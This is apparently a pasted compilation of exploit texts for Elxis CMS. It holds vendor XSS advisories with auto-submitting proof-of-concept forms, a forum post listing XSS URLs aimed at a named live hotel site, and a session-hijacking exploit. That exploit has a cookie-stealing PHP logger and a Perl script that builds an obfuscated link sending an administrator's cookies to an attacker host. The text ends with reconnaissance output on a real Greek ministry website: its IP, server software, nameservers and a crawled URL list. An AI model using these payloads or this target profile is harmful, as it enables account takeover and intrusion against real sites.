  736. ====================================
  737. Vulnerability ID: HTB22614
  738. Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_elxis_cms.html
  739. Product: Elxis CMS
  740. Vendor: Elxis Team ( http://www.elxis.org/ )
  741. Vulnerable Version: 2009.2 electra rev2631 and probably prior versions
  742. Vendor Notification: 20 September 2010
  743. Vulnerability Type: XSS (Cross Site Scripting)
  744. Status: Fixed by Vendor
  745. Risk level: Medium
  746. Credit: High-Tech Bridge SA - Ethical Hacking &amp; Penetration Testing (http://www.htbridge.ch/)
  747.  
  748. Vulnerability Details:
  749. User can execute arbitrary JavaScript code within the vulnerable application.
  750.  
  751. The vulnerability exists due to failure in the "administrator/components/com_users/admin.users.php" script to properly sanitize user-supplied input in "search" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
  752.  
  753. An attacker can use browser to exploit this vulnerability. The following PoC is available:
  754.  
  755. <form action="http://host/administrator/index2.php" method="post" name="main" >
  756.  
  757. <input type="hidden" name="search" value='1"><script>alert(document.cookie)</script>' />
  758. <input type="hidden" name="filter_logged" value="0" />
  759. <input type="hidden" name="filter_enabled" value="-1" />
  760. <input type="hidden" name="filter_type" value="Super Administrator" />
  761. <input type="hidden" name="filter_expired" value="-1" />
  762. <input type="hidden" name="limit" value="20" />
  763. <input type="hidden" name="limitstart" value="0" />
  764. <input type="hidden" name="option" value="com_users" />
  765. <input type="hidden" name="task" value="" />
  766. <input type="hidden" name="boxchecked" value="0" />
  767. <input type="hidden" name="hidemainmenu" value="0" />
  768.  
  769. </form>
  770. <script>
  771. document.main.submit();
  772. </script>
  773.  
  774. Solution: Upgrade to the most recent version
  775.  
  776. ====================================
  777. Vulnerability ID: HTB22615
  778. Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_elxis_cms_contacts.html
  779. Product: Elxis CMS
  780. Vendor: Elxis Team ( http://www.elxis.org/ )
  781. Vulnerable Version: 2009.2 electra rev2631 and probably prior versions
  782. Vendor Notification: 20 September 2010
  783. Vulnerability Type: XSS (Cross Site Scripting)
  784. Status: Fixed by Vendor
  785. Risk level: Medium
  786. Credit: High-Tech Bridge SA - Ethical Hacking &amp; Penetration Testing (http://www.htbridge.ch/)
  787.  
  788. Vulnerability Details:
  789. User can execute arbitrary JavaScript code within the vulnerable application.
  790.  
  791. The vulnerability exists due to failure in the "administrator/index2.php" script to properly sanitize user-supplied input in "misc" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
  792.  
  793. An attacker can use browser to exploit this vulnerability. The following PoC is available:
  794.  
  795. <form action="http://eecore/elxis/administrator/index2.php" method="post" name="main" >
  796. <input type="hidden" name="catid" value="1" />
  797. <input type="hidden" name="user_id" value="0" />
  798. <input type="hidden" name="name" value="My Name" />
  799. <input type="hidden" name="seotitle" value="sef-url" />
  800. <input type="hidden" name="con_position" value="Website manager" />
  801. <input type="hidden" name="email_to" value="webmaster@example.com" />
  802. <input type="hidden" name="address" value="My address" />
  803. <input type="hidden" name="suburb" value="city" />
  804. <input type="hidden" name="state" value="reg" />
  805. <input type="hidden" name="country" value="country" />
  806. <input type="hidden" name="postcode" value="12345" />
  807. <input type="hidden" name="telephone" value="123" />
  808. <input type="hidden" name="fax" value="123" />
  809. <input type="hidden" name="misc" value='hello"><script>alert(document.cookie)</script>' />
  810. <input type="hidden" name="default_con" value="1" />
  811. <input type="hidden" name="published" value="1" />
  812. <input type="hidden" name="ordering" value="1" />
  813. <input type="hidden" name="access" value="29" />
  814. <input type="hidden" name="image" value="asterisk.png" />
  815. <input type="hidden" name="params[menu_image]" value="-1" /><input type="hidden" name="params[menu_image_only]" value="0" /><input type="hidden" name="params[pageclass_sfx]" value="" /><input type="hidden" name="params[print]" value="" /><input type="hidden" name="params[back_button]" value="" /><input type="hidden" name="params[name]" value="1" /><input type="hidden" name="params[position]" value="1" /><input type="hidden" name="params[email]" value="0" /><input type="hidden" name="params[street_address]" value="1" /><input type="hidden" name="params[suburb]" value="1" /><input type="hidden" name="params[state]" value="1" /><input type="hidden" name="params[country]" value="1" /><input type="hidden" name="params[postcode]" value="1" /><input type="hidden" name="params[telephone]" value="1" /><input type="hidden" name="params[fax]" value="1" /><input type="hidden" name="params[misc]" value="1" /><input type="hidden" name="params[vcard]" value="1" /><input type="hidden" name=!
  816.  "params[image]" value="1" /><input type="hidden" name="params[email_description]" value="1" /><input type="hidden" name="params[email_description_text]" value="" /><input type="hidden" name="params[email_form]" value="1" /><input type="hidden" name="params[email_copy]" value="1" /><input type="hidden" name="params[drop_down]" value="0" /><input type="hidden" name="params[contact_icons]" value="1" /><input type="hidden" name="params[icon_address]" value="" /><input type="hidden" name="params[icon_email]" value="" /><input type="hidden" name="params[icon_telephone]" value="" /><input type="hidden" name="params[icon_fax]" value="" /><input type="hidden" name="params[icon_misc]" value="" />
  817. <input type="hidden" name="option" value="com_contact" />
  818. <input type="hidden" name="id" value="1" />
  819. <input type="hidden" name="task" value="save" />
  820. </form>
  821. <script>
  822. document.main.submit();
  823. </script>
  824.  
  825. Solution: Upgrade to the most recent version
  826.  
  827.  
  828. ====================================
  829. Vulnerability ID: HTB22616
  830. Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_elxis_cms_polls_module.html
  831. Product: Elxis CMS
  832. Vendor: Elxis Team ( http://www.elxis.org/ )
  833. Vulnerable Version: 2009.2 electra rev2631 and probably prior versions
  834. Vendor Notification: 20 September 2010
  835. Vulnerability Type: XSS (Cross Site Scripting)
  836. Status: Fixed by Vendor
  837. Risk level: Medium
  838. Credit: High-Tech Bridge SA - Ethical Hacking &amp; Penetration Testing (http://www.htbridge.ch/)
  839.  
  840. Vulnerability Details:
  841. User can execute arbitrary JavaScript code within the vulnerable application.
  842.  
  843. The vulnerability exists due to failure in the "administrator/components/com_modules/admin.modules.php" script to properly sanitize user-supplied input in "title" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
  844.  
  845. An attacker can use browser to exploit this vulnerability. The following PoC is available:
  846.  
  847. <form action="http://host/administrator/index2.php" method="post" name="main" >
  848. <input type="hidden" name="title" value='Polls"><script>alert(document.cookie)</script>' />
  849. <input type="hidden" name="showtitle" value="1" />
  850. <input type="hidden" name="position" value="right" />
  851. <input type="hidden" name="languages[]" value="" />
  852. <input type="hidden" name="access" value="29" />
  853. <input type="hidden" name="published" value="1" />
  854. <input type="hidden" name="params[cache]" value="0" />
  855. <input type="hidden" name="params[moduleclass_sfx]" value="" />
  856. <input type="hidden" name="selections[]" value="0" />
  857. <input type="hidden" name="option" value="com_modules" />
  858. <input type="hidden" name="id" value="1" />
  859. <input type="hidden" name="original" value="1" />
  860. <input type="hidden" name="module" value="mod_poll" />
  861. <input type="hidden" name="task" value="save" />
  862. <input type="hidden" name="client_id" value="0" />
  863. </form>
  864. <script>
  865. document.main.submit();
  866. </script>
  867.  
  868. Solution: Upgrade to the most recent version
  869.  
  870. Elxis CMS version 2009.2 electra rev2631 suffers from SQL injection and cross site scripting vulnerabilities.
  871. swappie aka faithlove/elxis-xss.txt ( na)
  872. ?
  873.  
  874.        
  875. ################################################################
  876. #       .___             __          _______       .___        #
  877. #     __| _/____ _______|  | __ ____ \   _  \    __| _/____    #
  878. #    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   #
  879. #   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   #
  880. #   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   #
  881. #        \/                  \/             \/                 #
  882. #                   ___________   ______  _  __                #
  883. #                 _/ ___\_  __ \_/ __ \ \/ \/ /                #
  884. #                 \  \___|  | \/\  ___/\     /                 #
  885. #                  \___  >__|    \___  >\/\_/                  #
  886. #      est.2007        \/            \/   forum.darkc0de.com   #
  887. ################################################################
  888. ################################################################
  889. # Greetings to  --d3hydr8 -r45c4l -baltazar -sinner_01          #
  890. #       -C1c4Tr1Z -Gabitzu and all darkc0de members            #
  891. ;###############################################################
  892. #
  893. # Author: swappie [aka] faithlove
  894. #
  895. # Home : www.darkc0de.com
  896. #
  897. # Email : swappieakafaithlove@gmail.com
  898. #
  899. # Do researching and share!
  900. #
  901. ;###############################################################
  902. #
  903. # Title: Elxis 2008.1 Nemesis
  904. #
  905. # Issue Date: Monday, 29 September 2008
  906. #
  907. # CMS Link: http://www.elxis-downloads.com/fserver/96.html
  908.  
  909. # Vendor: http://www.elxis.org/
  910. #
  911. #
  912. ;###############################################################
  913. #
  914. # Dork: I'm sure you can figure that by yourself, right?
  915. #
  916. #################################################################
  917.  
  918.  
  919. ----------
  920. XSS Vulns;
  921. ----------
  922.  
  923. http://www.site.com/?>'"><script>alert("XSS Vuln")</script>
  924.  
  925. http://www.site.com/index.php/>"><script>alert("XSS Vuln")</script>
  926.  
  927. http://www.site.com/index.php?option=>"><script>alert("XSS Vuln")</script>
  928.  
  929. http://www.site.com/index.php?option=com_poll&amp;Itemid=>"><script>alert("XSS Vuln")</script>
  930.  
  931. http://www.site.com/index.php?option=com_poll&amp;task=view&amp;id=>"><script>alert("XSS Vuln")</script>
  932.  
  933. http://www.site.com/index.php?option=com_poll&amp;Itemid=1&amp;task=>"><script>alert("XSS Vuln")</script>
  934.  
  935. http://www.site.com/index.php?option=com_poll&amp;task=view&amp;bid=>"><script>alert("XSS Vuln")</script>
  936.  
  937. http://www.site.com/index.php?option=com_poll&amp;Itemid=1&amp;task=view&amp;contact_id=>"><script>alert("XSS Vuln")</script>
  938.  
  939. ----------
  940. Live Demo;
  941. ----------
  942.  
  943. http://www.hotelsinalbania.net/?>'"><script>alert("XSS Vuln")</script>
  944.  
  945. http://www.hotelsinalbania.net/index.php/>"><script>alert("XSS Vuln")</script>
  946.  
  947. http://www.hotelsinalbania.net/index.php?option=>"><script>alert("XSS Vuln")</script>
  948.  
  949. http://www.hotelsinalbania.net/index.php?option=com_poll&amp;Itemid=>"><script>alert("XSS Vuln")</script>
  950.  
  951. http://www.hotelsinalbania.net/index.php?option=com_poll&amp;task=view&amp;id=>"><script>alert("XSS Vuln")</script>
  952.  
  953. http://www.hotelsinalbania.net/index.php?option=com_poll&amp;Itemid=1&amp;task=>"><script>alert("XSS Vuln")</script>
  954.  
  955. http://www.hotelsinalbania.net/index.php?option=com_poll&amp;task=view&amp;bid=>"><script>alert("XSS Vuln")</script>
  956.  
  957. http://www.hotelsinalbania.net/index.php?option=com_poll&amp;Itemid=1&amp;task=view&amp;contact_id=>"><script>alert("XSS Vuln")</script>
  958.  
  959.  
  960. ;==================================================================;
  961. ;==================================================================;
  962.  
  963. -----------------
  964. Session Fixation;
  965. -----------------
  966.  
  967.  
  968. http://www.site.com/?PHPSESSID=[session_fixation]
  969.  
  970. Explanation:
  971.  
  972. The user's session ID could be fixed by the attacker before the user
  973. even logs on the target server so it wouldn't be needed to get the session
  974. ID afterwards.
  975.  
  976. How to fix the "session fixation" ?
  977.  
  978. There is a simple way to do it.
  979.  
  980. Step 1.
  981.  
  982. Open the file named php.ini from your server.
  983.  
  984. Step 2.
  985.  
  986. Look through the file for the following lines:
  987.  
  988. ; This option enables administrators to make their users invulnerable to
  989. ; attacks which involve passing session ids in URLs; defaults to 0.
  990.  
  991. ; session.use_only_cookies = 1    !![PLEASE NOTE THE ";"]!!
  992.  
  993.  
  994. Step 3.
  995.  
  996. => [ and make it look like this: ]
  997.  
  998. ; This option enables administrators to make their users invulnerable to
  999. ; attacks which involve passing session ids in URLs; defaults to 0.
  1000.  
  1001. session.use_only_cookies = 1
  1002.  
  1003. Step 4.
  1004.  
  1005. Restart the web server, php, whatever.
  1006.  
  1007.  
  1008.  
  1009. Cheers,
  1010.  
  1011. swappie [aka] faithlove
  1012.  
  1013. Elxis 2008.1 Nemesis suffers from multiple cross site scripting vulnerabilities.
  1014. mr.pr0n/Elxis 2009.3 Aphrodite Rev 2681 Session Hijacking / XSS ( na)
  1015. ?
  1016.  
  1017.        
  1018. #####################################################################################
  1019. # Exploit Title: Elxis 2009.3 Aphrodite rev2681 - Session hijacking Vulnerability
  1020. # Google Dork: --
  1021. # Date: 25/8/2011
  1022. # Author: mr.pr0n (@_pr0n_)
  1023. # Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr
  1024. # Software Link: http://www.elxis-downloads.com/downloads/download.html?id=325
  1025. # Version: Elxis 2009.3 Aphrodite rev2681
  1026. # Tested on: Linux Fedora 14
  1027. #####################################################################################
  1028.  
  1029. ================
  1030. | Description  |
  1031. ================
  1032. Elxis is powerful open source content management system (CMS) released for free under the GNU/GPL license. It has unique multi-lingual features, it follows W3C standards, it is secure, flexible, easy to use, and modern. The development team, Elxis Team, paid extra attention to the optimization of the CMS for the search engines and this lead to high performance of all elxis powered web sites and to high ranking in search engines results. We are glad to introduce you to the Elxis world. Welcome!
  1033.  
  1034. ===============================
  1035. | 0x01 | XSS Vulnerabilites   |
  1036. ===============================
  1037.  
  1038. ------------------------------------
  1039. | FrontPage Manager: (com_content) |
  1040. ------------------------------------
  1041.  
  1042. http://VICTIM_SERVER/elxis/administrator/index2.php?search=%27%22%3E%3Cmarquee%3E%3Ch1%3EXSS+Vulnerability%3C%2Fh1%3E%3C%2Fmarquee%3E&amp;filter_sectionid=0&amp;catid=0&amp;limit=20&amp;limitstart=0&amp;option=com_frontpage&amp;task=&amp;boxchecked=0&amp;simpleview=1
  1043.  
  1044. ------------------------------------------
  1045. | Content Items Manager: (com_frontpage) |
  1046. ------------------------------------------
  1047.  
  1048. http://VICTIM_SERVER/elxis/administrator/index2.php?search=%27%22%3E%3Cmarquee%3E%3Ch1%3EXSS+Vulnerability%3C%2Fh1%3E%3C%2Fmarquee%3E&amp;filter_pub=-3&amp;filter_sectionid=0&amp;catid=0&amp;limit=20&amp;limitstart=0&amp;option=com_content&amp;sectionid=0&amp;task=&amp;boxchecked=0&amp;hidemainmenu=0&amp;redirect=0&amp;simpleview=1
  1049.  
  1050. ------------------------------------
  1051. | Private Messages: (com_messages) |
  1052. ------------------------------------
  1053.  
  1054. http://VICTIM_SERVER/elxis/administrator/index2.php?search=%27%22%3E%3Cmarquee%3E%3Ch1%3EXSS+Vulnerability%3C%2Fh1%3E%3C%2Fmarquee%3E&amp;limit=20&amp;limitstart=0&amp;option=com_messages&amp;task=&amp;boxchecked=0&amp;hidemainmenu=0
  1055.  
  1056. ------------------------------
  1057. | Menus Manager: (com_menus) |
  1058. ------------------------------
  1059.  
  1060. http://VICTIM_SERVER/elxis/administrator/index2.php?levellimit=1&amp;search=%27%22%3E%3Cmarquee%3E%3Ch1%3EXSS+Vulnerability%3C%2Fh1%3E%3C%2Fmarquee%3E&amp;order%5B%5D=1&amp;access=29&amp;order%5B%5D=1&amp;access=29&amp;order%5B%5D=3&amp;access=29&amp;order%5B%5D=1&amp;access=29&amp;order%5B%5D=2&amp;access=29&amp;order%5B%5D=3&amp;access=29&amp;order%5B%5D=3&amp;access=29&amp;order%5B%5D=1&amp;access=29&amp;order%5B%5D=2&amp;access=29&amp;order%5B%5D=3&amp;access=29&amp;order%5B%5D=5&amp;access=29&amp;order%5B%5D=5&amp;access=29&amp;order%5B%5D=7&amp;access=29&amp;order%5B%5D=7&amp;access=29&amp;order%5B%5D=9&amp;access=29&amp;order%5B%5D=10&amp;access=29&amp;order%5B%5D=10&amp;access=29&amp;order%5B%5D=12&amp;access=29&amp;order%5B%5D=12&amp;access=29&amp;limit=20&amp;limitstart=0&amp;option=com_menus&amp;menutype=mainmenu&amp;task=&amp;boxchecked=0&amp;hidemainmenu=0
  1061.  
  1062.  
  1063. ===========================================
  1064. | 0x02 | Session hijacking Vulnerability  |
  1065. ===========================================
  1066.  
  1067. ------------
  1068. | Intro... |
  1069. ------------
  1070.  
  1071. The Session Hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed for a session token.
  1072.  
  1073. Because http communication uses many different TCP connections, the web server needs a method to recognize every user’s connections. The most useful method depends on a token that the Web Server sends to the client browser after a successful client authentication. A session token is normally composed of a string of variable width and it could be used in different ways, like in the URL, in the header of the http requisition as a cookie, in other parts of the header of the http request, or yet in the body of the http requisition.
  1074.  
  1075. The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.
  1076.  
  1077. The session token could be compromised in different ways; the most common are:
  1078.  
  1079.   [*] Predictable session token;
  1080.   [*] Session Sniffing;
  1081.   [*] Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc);
  1082.   [*] Man-in-the-middle attack
  1083.   [*] Man-in-the-browser attack
  1084.  
  1085. Source:
  1086. https://www.owasp.org/index.php/Session_hijacking_attack
  1087.  
  1088. -----------------
  1089. | The 1st Step  |
  1090. -----------------
  1091. Upload to the ATTACKER_SERVER:
  1092.  
  1093.   [*] stealer.php - [Record the cookies of every user that views it!]
  1094.   [*] gotit.txt - [The log file!]
  1095.  
  1096. //--- stealer.php ---
  1097. <?php
  1098. header ('Location:http://VICTIM_SERVER/elxis/administrator/index2.php');
  1099. $cookie = $_GET['cookie'];
  1100. $log = fopen("gotit.txt", "a");
  1101. fwrite($log, $cookie ."\n");
  1102. fclose($log);
  1103. ?>
  1104. //--- end ---
  1105.  
  1106. -----------------
  1107. | The 2nd Step  |
  1108. -----------------
  1109. Create the "evil" link (with the Elxis_2009.3_Aphrodite_rev2681.pl).
  1110.  
  1111. # --- Elxis_2009.3_Aphrodite_rev2681.pl ---
  1112. #!/usr/bin/perl
  1113. print "\n   |==[ mr.pr0n ]=============================================== |\n";
  1114. print "   | Elxis 2009.3 Aphrodite rev2681 - ..the evil link creator    |\n";
  1115. print "   |===================[ http://ghostinthelab.wordpress.com/ ]== |\n";
  1116.  
  1117. print "\nEnter the target (e.g.: http://victim.com)";
  1118. print "\n> ";
  1119. $target=<STDIN>;
  1120. chomp($target);
  1121. $target = "http://".$target if ($target !~ /^http:/);
  1122.  
  1123. print "Enter the elxis directory (e.g.: elxis)";
  1124. print "\n> ";
  1125. $dir=<STDIN>;
  1126. chomp($dir);
  1127.  
  1128. $target = $target."/".$dir;
  1129.  
  1130. print "Enter the address of the \"stealer.php\" (e.g.: http://attacker.com/directory/stealer.php)";
  1131. print "\n> ";
  1132. $stealer=<STDIN>;
  1133. chomp($stealer);
  1134.  
  1135. $result = "document.location=\"$stealer?cookie=\"+document.cookie\;";
  1136. $result =~ s/(.)/sprintf("%x%",ord($1))/eg;
  1137.  
  1138. print "\n[+] Send this link to your victim...\n\n";
  1139. print $target."/administrator/index2.php?option=com_frontpage&amp;search='\"><%73%63%72%69%70%74>%".$result."3b<%2F%73%63%72%69%70%74>\n";
  1140. #--- end ---
  1141.  
  1142. ----------------
  1143. | The 3rd Step |
  1144. ----------------
  1145. Send the "evil" link to the administrator....
  1146. WARNING:  The administrator *MUST* be logged in. |
  1147.  
  1148.  
  1149. ----------------
  1150. | The 4th Step |
  1151. ----------------
  1152. Go to http://VICTIM_SERVER/elxis/administrator/
  1153. Insert into your cookie the hijacked session.
  1154. Go to http://VICTIM_SERVER/elxis/administrator/index2.php
  1155. ...Welcome administrator :-)
  1156.  
  1157. ----------------------------------------------------------------
  1158. | See the Demo |  http://blip.tv/play/AYLPjzUC                 |
  1159. ----------------------------------------------------------------
  1160.  
  1161. The certificate is self-signed. Users will receive a warning when accessing this site unless the certificate is manually added as a trusted certificate to their web browser. You can fix this error by buying a trusted SSL certificate
  1162.         Common name: *.mfa.gr
  1163. Organization: MFA - Association of Hellenic Internet Users (EEXI)
  1164. Location: Athens, Attica, GR
  1165. Valid from November 12, 2007 to November 9, 2017
  1166. Serial Number: f13eea99512e0038
  1167. Signature Algorithm: sha1WithRSAEncryption
  1168. Issuer: *.mfa.gr
  1169. 2 sites hosted on IP Address 84.205.251.33
  1170. ID      Domain  Site Link
  1171. 1       www1.mfa.gr     www1.mfa.gr
  1172. 2       mfa.gr  mfa.gr
  1173. User-agent: *
  1174. Disallow: /administrator/
  1175. Disallow: /bridges/
  1176. Disallow: /cache/
  1177. Disallow: /editor/
  1178. Disallow: /includes/
  1179. Disallow: /installation/
  1180. ↑ Top
  1181. Scan for: http://www.mfa.gr/
  1182. Hostname: www.mfa.gr
  1183. IP address: 84.205.251.33
  1184.  
  1185. System Details:
  1186. Running on: Apache/2.2.17
  1187. System info: (Debian)
  1188. Powered by: PHP/5.3.3-7
  1189.  
  1190. Web application details:
  1191. Application: Elxis - Copyright (C) 2006-2012 Elxis.org. All rights reserved.
  1192. Domain NS records       Nameserver records returned by the parent servers are:
  1193.  
  1194. ns2.otenet.gr.   ['195.170.2.1']   [TTL=10800]
  1195. dnsa.mfa.gr.   ['195.167.30.162']   [TTL=10800]
  1196. ns1.otenet.gr.   ['195.170.0.2'] (NO GLUE)   [TTL=10800]
  1197.  
  1198. http://dnsa.mfa.gr/
  1199. http://www.mfa.gr/administrator/includes/js/ajax_new.js
  1200. http://www.mfa.gr/includes/js/elxis.js
  1201. http://www.mfa.gr/modules/mod_sonofsucker_h/sonofsucker.js
  1202. http://www.mfa.gr/templates/mfa_gov_gr/js/roundies-compressed.js
  1203. http://www.mfa.gr/templates/mfa_gov_gr/js/scrollpage.js
  1204. http://www.mfa.gr/modules/mod_contentfader/js/jquery.min.js
  1205. http://www.mfa.gr/modules/mod_contentfader/js/ui.core.js
  1206. http://www.mfa.gr/modules/mod_contentfader/js/ui.tabs.js
  1207. http://www.mfa.gr/modules/mod_flash/swfobject.js
  1208. http://www.mfa.gr/
  1209. http://www.mfa.gr/en/
  1210. http://www.mfa.gr/fr/
  1211. http://www.mfa.gr/to-ypourgeio/
  1212. http://www.mfa.gr/igesia/
  1213. http://www.mfa.gr/igesia/ypourgos/o-ypourgos.html
  1214. http://www.mfa.gr/igesia/yfypourgoi/
  1215. http://www.mfa.gr/igesia/genikoi-grammateis/o-genikos-grammateas.html
  1216. http://www.mfa.gr/igesia/genikoi-grammateis/genikos-grammateas-dos-as.html
  1217. http://www.mfa.gr/igesia/genikoi-grammateis/eidike-grammateas-axiopoieses-diethnon-programmaton.html
  1218. http://www.mfa.gr/domi.html
  1219. http://www.mfa.gr/to-ypourgeio/domi/apostoli-kai-armodiotites.html
  1220. http://www.mfa.gr/to-ypourgeio/stelehosi-ypex/
  1221. http://www.mfa.gr/to-ypourgeio/domi/monada-diaheirisis-kriseon.html
  1222. http://www.mfa.gr/to-ypourgeio/diplomatiki-akademia/
  1223. http://www.mfa.gr/to-ypourgeio/domi/ydas.html
  1224. http://www.mfa.gr/diplomatiko-kai-istoriko-arheio/
  1225. http://www.mfa.gr/to-ypourgeio/domi/kas.html
  1226. http://www.mfa.gr/to-ypourgeio/domi/grafeio-proothisis-ellinikon-ypopsifiotiton-se-diethneis-kai-yperethnikous-organismous.html
  1227. http://www.mfa.gr/epopteuomenoi-organismoi/
  1228. http://www.mfa.gr/to-ypourgeio/istoria/oi-egkatastaseis-tou-ypourgeiou-exoterikon.html
  1229. http://www.mfa.gr/to-ypourgeio/diethneis-symvaseis/
  1230. http://www.mfa.gr/organismos-ypex/
  1231. http://www.mfa.gr/exoteriki-politiki/
  1232. http://www.mfa.gr/dimereis-sheseis-tis-ellados.html
  1233. http://www.mfa.gr/eidika-themata-exoterikis-politikis/
  1234. http://www.mfa.gr/zitimata-ellinotourkikon-sheseon/
  1235. http://www.mfa.gr/kypriako/
  1236. http://www.mfa.gr/to-zitima-tou-onomatos-tis-pgdm/
  1237. http://www.mfa.gr/exoteriki-politiki/periferiaki-politiki/
  1238. http://www.mfa.gr/exoteriki-politiki/periferiaki-politiki/dytika-valkania.html
  1239. http://www.mfa.gr/exoteriki-politiki/periferiaki-politiki/mesogeios.html
  1240. http://www.mfa.gr/exoteriki-politiki/periferiaki-politiki/mesi-anatoli.html
  1241. http://www.mfa.gr/exoteriki-politiki/periferiaki-politiki/eyxeinos-pontos.html
  1242. http://www.mfa.gr/exoteriki-politiki/i-ellada-stin-ee/
  1243. http://www.mfa.gr/exoteriki-politiki/i-ellada-stous-diethneis-organismous/
  1244. http://www.mfa.gr/exoteriki-politiki/pagkosmia-zitimata/
  1245. http://www.mfa.gr/vouli-kai-exoteriki-politiki/
  1246. http://www.mfa.gr/omilies/
  1247. http://www.mfa.gr/koinovouleutikos-eleghos/
  1248. http://www.mfa.gr/exoteriki-politiki/ethniko-symvoulio-exoterikis-politikis/
  1249. http://www.mfa.gr/epikairotita/
  1250. http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/
  1251. http://www.mfa.gr/epikairotita/proto-thema/
  1252. http://www.mfa.gr/epikairotita/enimerosi-syntakton/
  1253. http://www.mfa.gr/epikairotita/diloseis-omilies/
  1254. http://www.mfa.gr/polymesa/
  1255. http://www.mfa.gr/polymesa/video/video-ypex.html
  1256. http://www.mfa.gr/polymesa/photographies/
  1257. http://www.mfa.gr/polymesa/ihitika/
  1258. http://www.mfa.gr/arheio-epikairotitas.html
  1259. http://www.mfa.gr/ypiresies/
  1260. http://www.mfa.gr/ypiresies-gia-ton-politi/
  1261. http://www.mfa.gr/kep-politon-kai-apodimon-ellinon.html
  1262. http://www.mfa.gr/ypiresies-gia-ton-politi/metafrastiki-ypiresia/i-metaphrastiki-ypiresia.html
  1263. http://www.mfa.gr/ypiresies-gia-ton-politi/dioikitikes-ypotheseis/
  1264. http://www.mfa.gr/ypiresies-gia-ton-politi/dikastikes-ypotheseis/
  1265. http://www.mfa.gr/ypiresies-gia-ton-politi/naytiliakes-ypotheseis/
  1266. http://www.mfa.gr/proxeniki-syndromi.html
  1267. http://www.mfa.gr/theoriseis-eisodou-visas/
  1268. http://www.mfa.gr/theoriseis-eisodou-visas/eidi-theoriseon/ethnikes-theoriseis.html
  1269. http://www.mfa.gr/theoriseis-eisodou-visas/theoriseis-schengen/
  1270. http://www.mfa.gr/theoriseis-eisodou-visas/theoriseis-gia-allodapous-pou-taxidevoun-stin-ellada/
  1271. http://www.mfa.gr/theoriseis-eisodou-visas/theoriseis-gia-ellines-pou-taxidevoun-sto-exoteriko/
  1272. http://www.mfa.gr/ypiresies-gia-epiheiriseis/
  1273. http://www.mfa.gr/ypiresies-gia-epiheiriseis/ypiresies-gia-exostrefeis-epiheiriseis/
  1274. http://www.mfa.gr/ypiresies-gia-epiheiriseis/dimosioi-diagonismoi-diavouleyseis/
  1275. http://www.mfa.gr/eykairies-stadiodromias/
  1276. http://www.mfa.gr/dinatotites-epaggelmatikis-stadiodromias-sto-ypex/
  1277. http://www.mfa.gr/eykairies-stadiodromias/epaggelmatiki-stadiodromia-se-diethneis-organismous/
  1278. http://www.mfa.gr/prokirixeis-theseon-dep/
  1279. http://www.mfa.gr/ethelontismos.html
  1280. http://www.mfa.gr/contact/mfa-el-contacts/ypourgeio-exoterikon.html
  1281. http://www.mfa.gr/katalogos.html
  1282. appendix/dimereis-sheseis-tis-ellados/alpha.html
  1283. http://www.mfa.gr/xenes-arhes-stin-ellada.html
  1284. epikairotita/proto-thema/sunantese-upeks-abramopoulou-me-presbeis-arabikon-khoron-2.html
  1285. epikairotita/proto-thema/deloseis-upeks-abramopoulou-kai-upeks-mexikou-pe-candellano-meta-te-sunantese-tous.html
  1286. epikairotita/proto-thema/deloseis-upeks-abramopoulou-kai-upourgou-tourismou-kephalogianne.html
  1287. epikairotita/proto-thema/sunantese-upeks-abramopoulou-me-upourgo-europaikon-upotheseon-kai-exoterikou-emporiou-tes-phinlandias-stubb.html
  1288. http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/epikoinonia-tou-upeks-abramopoulou-me-to-neo-eidiko-entetalmeno-tes-ee-gia-ta-anthropina-dikaiomata-st-lamprinide.html
  1289. http://www.mfa.gr/epikairotita/diloseis-omilies/apantese-tou-ekprosopou-upeks-se-eroteseis-skhetika-me-anakoinothen-grapheiou-prothupourgou-pgdm.html
  1290. http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/anakoinose-gia-pragmatopoietheisa-sunantese-upeks-abramopoulou-me-presbe-serbias.html
  1291. http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/anakoinose-gia-pragmatopoietheisa-sunantese-upeks-abramopoulou-me-presbe-israel.html
  1292. http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/sunantese-ellena-diapragmateute-gia-to-thema-tes-onomasias-tes-pgdm-presbe-ad-basilake-me-prosopiko-apestalmeno-ggee-nimetz.html
  1293. http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/summetokhe-uphupeks-kourkoula-se-sumboulia-exoterikon-upotheseon-kai-genikon-upotheseon-2.html
  1294. eykairies-stadiodromias/
  1295. ypiresies-gia-ton-politi/
  1296. ypiresies-gia-epiheiriseis/ypiresies-gia-exostrefeis-epiheiriseis/
  1297. theoriseis-eisodou-visas/
  1298. stoiheia-epikoinonias.html
  1299. proxeniki-syndromi.html
  1300. ypiresies-gia-epiheiriseis/dimosioi-diagonismoi-diavouleyseis/
  1301. http://www.facebook.com/mfa.gr
  1302. http://www.mfa.gr/rss/rss20.xml
  1303. http://www.mfa.gr/sitemap/
  1304. http://www.mfa.gr/search.html
  1305. http://www.mfa.gr/oroi-hrisis.html
  1306. http://www.mfa.gr/links/diadiktiakoi-topoi-ypex/
  1307.  
  1308. gr-us.ics.forth.gr was kind enough to give us that information.
  1309. Pass    TLD Parent Check        Good. gr-us.ics.forth.gr, the parent server I interrogated, has information for your TLD. This is a good thing as there are some other domain extensions like "co.us" for example that are missing a direct check.
  1310. Pass    Your nameservers are listed     Good. The parent server gr-us.ics.forth.gr has your nameservers listed. This is a must if you want to be found as anyone that does not know your DNS servers will first ask the parent nameservers.
